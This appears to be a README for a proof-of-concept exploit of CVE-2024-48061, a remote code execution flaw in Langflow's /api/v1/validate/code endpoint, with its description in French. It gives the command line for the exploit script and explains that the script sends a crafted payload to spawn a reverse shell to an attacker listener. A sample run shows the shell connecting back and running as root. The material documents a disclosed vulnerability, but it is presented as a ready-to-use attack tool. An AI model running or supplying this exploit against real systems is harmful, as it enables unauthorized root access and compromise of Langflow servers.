
CVE-2024-48061 Langflow vulnerable to remote code execution. Poc
python3 poc.py -i <web_ip> -p <web_port> -l <listener_ip> -lp <listener_port>
Ce script exploite un point de terminaison API vulnérable à /api/v1/validate/code sur le serveur web cible.
Il vérifie d'abord la présence du chemin vulnérable, puis démarre un écouteur TCP sur l'adresse IP et le port spécifiés.
Une fois l'écouteur prêt, il envoie une charge utile spécialement conçue à la cible
pour générer un shell inverse qui se connecte à l'écouteur.
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[+] Vulnerability detected at http://192.168.0.2:7860/api/v1/validate/code
[+] Listening on 192.168.0.3:4444 ...
[+] Sending payload to http://192.168.0.2:7860/api/v1/validate/code
[+] Connection from 192.168.0.2:60440
# whoami
whoami
root
# exit
[*] Exiting shell.
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[-] Doesn't look vulnerable